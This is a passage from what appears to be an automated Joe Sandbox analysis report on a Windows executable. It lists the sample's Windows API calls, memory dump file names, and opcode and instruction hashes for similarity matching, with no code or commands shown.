        • Part of subcall function 00007FF741EC7934: GetCurrentProcess.KERNEL32(00007FF741ED0CCD), ref: 00007FF741EC7961
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: CurrentProcess_invalid_parameter_noinfo
      • String ID: *?$.
      • API String ID: 2518042432-3972193922
      • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
      • Instruction ID: dc7936077dadfb81f0003df1e48b5cf56fece7e7576a520f41acc93517fe3ebb
      • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
      • Instruction Fuzzy Hash: 8F51D46AF18A6581EB16FF62D8104F9A3A4FB48BD9B844531DE1E17B84EFBCD441C310
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: memcpy_s
      • String ID:
      • API String ID: 1502251526-0
      • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
      • Instruction ID: 72531c675866d81918e2859aac4b0b6c64525f5b2b620fa643fdaf9558fbe48a
      • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
      • Instruction Fuzzy Hash: F5D1C036B1C293C7EB25FF15E18466AB7A1FB98785F888134DB5A53B45CA3CE8418B10
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ObjectRelease$CapsDevice
      • String ID:
      • API String ID: 1061551593-0
      • Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
      • Instruction ID: 5be96cfd390bf04aa9c9f4b2fcbe5edecd0686cf18175a442423ebdabc9ef12f
      • Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
      • Instruction Fuzzy Hash: 91813D3AB08A26C6EB11FF6AD840AACB771FB84B89F844122DE0D57768DF78D545C350
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ErrorFormatFreeLastLocalMessage
      • String ID:
      • API String ID: 1365068426-0
      • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
      • Instruction ID: bc7051bb25c8f8578777f7cfc36cf4fe561068cb2a064d2918c876dbc9aa6418
      • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
      • Instruction Fuzzy Hash: 52014F7961C752C2EB11BF22B85057AA392FB8ABC2F884134EA8D47B45CF7CD5058714
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID: .
      • API String ID: 0-248832578
      • Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
      • Instruction ID: 95a4a7389f56bd6415e2023b084d897eacdd8397efefbf4ed56bb669482d9c30
      • Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
      • Instruction Fuzzy Hash: 84310A26B0C6A189E721BA269C047A9EA91BB54FE4F848235EE6D07BC5DF7CD501C700
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ExceptionRaise_clrfp
      • String ID:
      • API String ID: 15204871-0
      • Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
      • Instruction ID: c5ff4f67bfa457aaaa4b220e56b6028baf27e2c3f7e7f3709c2223f028730c88
      • Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
      • Instruction Fuzzy Hash: 92B1AE37604B95CBEB1AEF29C84636C7BB0FB44B49F188921DA6D837A4CB79D451C710
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: FormatInfoLocaleNumber
      • String ID:
      • API String ID: 2169056816-0
      • Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
      • Instruction ID: 72405f7f45b4f425f7a908d146501e10f63c4392be64d388e63c8dbe2a7839f6
      • Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
      • Instruction Fuzzy Hash: C1116A2AA0CB95D5E762BF11E8007A9B360FF88B85FC48131EA8C03664EFBCD155C758
      APIs
        • Part of subcall function 00007FF741EA24C0: CreateFileW.KERNELBASE ref: 00007FF741EA259B
        • Part of subcall function 00007FF741EA24C0: GetLastError.KERNEL32 ref: 00007FF741EA25AE
        • Part of subcall function 00007FF741EA24C0: CreateFileW.KERNEL32 ref: 00007FF741EA260E
        • Part of subcall function 00007FF741EA24C0: GetLastError.KERNEL32 ref: 00007FF741EA2617
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA15D0
        • Part of subcall function 00007FF741EA3980: MoveFileW.KERNEL32 ref: 00007FF741EA39BD
        • Part of subcall function 00007FF741EA3980: MoveFileW.KERNEL32 ref: 00007FF741EA3A34
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 34527147-0
      • Opcode ID: a3f7aeee67f5c6efee88f6f2c4f2f574ca9db3d7719bf1359f9a84a60e1a1e68
      • Instruction ID: 08a98a2467b413d827a31ba794e05bf223048635c5de5c937148b8371b250c12
      • Opcode Fuzzy Hash: a3f7aeee67f5c6efee88f6f2c4f2f574ca9db3d7719bf1359f9a84a60e1a1e68
      • Instruction Fuzzy Hash: 0B91EF2AB2C662C2EB11FF22E4442ADA361FB44BC5F840032EE4D07B95DFB9D549C310
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Version
      • String ID:
      • API String ID: 1889659487-0
      • Opcode ID: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
      • Instruction ID: f5b4da48ae25eb144b5026ddcdb39ae8650fe2b2a1f0d49c1e729bd801a6b91f
      • Opcode Fuzzy Hash: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
      • Instruction Fuzzy Hash: 5401177990C652CAF726BB00E84077AB3A1BBD8356FD40234E65D42790DBBCE5058A20
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: 0
      • API String ID: 3215553584-4108050209
      • Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
      • Instruction ID: 8e46e89dd9246b3e4413fc85b21b2c2b99801212a8e764b1b9e77482b2b98020
      • Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
      • Instruction Fuzzy Hash: D9817829A1C222C6FB6ABA148E40E7DA794FF51746F901431ED0987685EFBDE803C721
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: 0
      • API String ID: 3215553584-4108050209
      • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
      • Instruction ID: 2c6b7df5993019ab67f12eff35d07c2ecd6441de7767193a27656788d4d5b616
      • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
      • Instruction Fuzzy Hash: 21715D2DA4C263C6FBAA791D8A40A7DD390BF41746F941531CD0987686EFADE847C720
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID: gj
      • API String ID: 0-4203073231
      • Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
      • Instruction ID: 97e24b0a1d58918f77e69b084c86fd0a57c784a699b8f30d3ce2deeee3930c82
      • Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
      • Instruction Fuzzy Hash: 935191377286908BD725DF25E400A9EB3A5F388798F445126EF4A93B09CB3DE945CF40
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID: @
      • API String ID: 0-2766056989
      • Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
      • Instruction ID: d923e6fc9af7894b390605e91947de23cebdc8827b969f7f45c9ed5953d280db
      • Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
      • Instruction Fuzzy Hash: 88418D36718B69C5EB05BF2AE8141A9B3A1B758FD0B8D9036EE1D87764EE7CD041C340
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: HeapProcess
      • String ID:
      • API String ID: 54951025-0
      • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
      • Instruction ID: 4f1ab57cc4fc6fced805b2401c8e446644d337471ae99e2184f1358f52468719
      • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
      • Instruction Fuzzy Hash: 8BB09228E1BB12C2EB0A3B116C82254A2A4BF98B02FD88038D64C41330DE6C20A64720
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
      • Instruction ID: a68510d3c8775aba4c72b6404041feb66c2e30d5a7c091c81dd50748c8d48988
      • Opcode Fuzzy Hash: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
      • Instruction Fuzzy Hash: 078214AAA0D6D1C6D706FF28D5442BCBBA1F751B89F598236CB8E07385DA7CD845C320
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
      • Instruction ID: e97f1b11b3c46ceddbf7b120d31627f1f85e6bd7f0934c4516e5700c17b8688b
      • Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
      • Instruction Fuzzy Hash: C1627E9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
      • Instruction ID: 5b90ddb552c8a88293f0b589a70ed243ce8730c648f4e79dbb4046db9b81c216
      • Opcode Fuzzy Hash: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
      • Instruction Fuzzy Hash: 2B8221BAA0D2E08AD726FF24D4446FCB7A1FB55B49F488236CA4E07789DA7C9445C720
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
      • Instruction ID: f98c799f7ef445d51d876f86ba95bddfa4e9ab77f449e2ead83d77a21dc8c1b5
      • Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
      • Instruction Fuzzy Hash: 7922E3B7B246508BD728CF25C89AE5E3766F798744B4B8228DF0ACB785DB38D505CB40
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
      • Instruction ID: 3144fa7760c3219c1b6d4b6d15039d88218268bde7242282dc2105bdce67ae74
      • Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
      • Instruction Fuzzy Hash: 3032F176A081A1CBE71EFF24D550ABC77A1FB54B09F408239DB4A87B88DB7CA850C750
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
